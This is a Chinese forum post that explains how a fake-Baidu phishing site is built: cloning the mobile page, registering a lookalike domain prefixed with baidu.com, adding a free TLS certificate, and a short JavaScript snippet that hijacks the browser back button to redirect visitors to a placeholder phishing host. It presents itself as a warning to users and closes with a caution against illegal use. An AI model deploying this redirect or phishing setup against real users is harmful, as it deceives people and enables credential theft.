论假百度钓鱼网站的实现过程
12

论假百度钓鱼网站的实现过程

源站链接: https://tkvern.com

近日在UC头条上看到一则新闻【 网友反映可能上了“假百度” 官方通报: 百度搜索移动端被劫持

今天来讨论一些假百度的实现过程,防止大家以后上当受骗。未看新闻的童鞋先去补补课。下面是概览图。

图4

图1

图2

图3

仿制百度移动版网站

会Web开发的童鞋都知道,仿制网站的第一步就是将站点的资源都抠下来。如下

图5

不需要的JS可以删除掉,页面上的链接可以任意发挥。

修改DNS解析,让假百度更真

给域名添加一个baidu.com的前缀,以假乱真。

图6

购买免费子域名证书,疏而不漏

在手机上访问时会有个安全的小钥匙,这个必不可少

图7

图6

买了免费证书配置到Nginx代理中就可使用了。

重点,劫持用户

只需要简单的JS就可以劫持用户的真实地址了,当用户通过百度搜索进入的你的网站时,你就可以劫持用户到假百度去了。至于怎么让百度能搜索到你的网站,这就可以问问百度了,百度有竞价排名。

window.onload=function(){
    //用于捕获浏览器回退事件,或手机回退的物理按键
    history.pushState(null,null,null);
    window.onpopstate=function(){
      //当用户点击后退时,进入假百度
      location.replace("https://baidu.com-search.xxx.com");
    }
};

图1

结语

本文旨在防止大家上当受骗,解析钓鱼网站是如何使用的,切勿非法使用!!!

本帖已被设为精华帖!
本帖由 Summer 于 1年前 加精
《L04 微信小程序从零到发布》
从小程序个人账户申请开始,带你一步步进行开发一个微信小程序,直到提交微信控制台上线发布。
《L05 电商实战》
从零开发一个电商项目,功能包括电商后台、商品 & SKU 管理、购物车、订单管理、支付宝支付、微信支付、订单退款流程、优惠券等
讨论数量: 3
MrJing

点浏览器的返回按钮,进入了假百度吗?

1年前
VernBrandl

@MrJing 按如上步骤实现,可以。

1年前

还好我已经多年不用百度。

1年前

  • 请注意单词拼写,以及中英文排版,参考此页
  • 支持 Markdown 格式, **粗体**、~~删除线~~、`单行代码`, 更多语法请见这里 Markdown 语法
  • 支持表情,使用方法请见 Emoji 自动补全来咯,可用的 Emoji 请见 :metal: :point_right: Emoji 列表 :star: :sparkles:
  • 上传图片, 支持拖拽和剪切板黏贴上传, 格式限制 - jpg, png, gif
  • 发布框支持本地存储功能,会在内容变更时保存,「提交」按钮点击时清空
  请勿发布不友善或者负能量的内容。与人为善,比聪明更重要!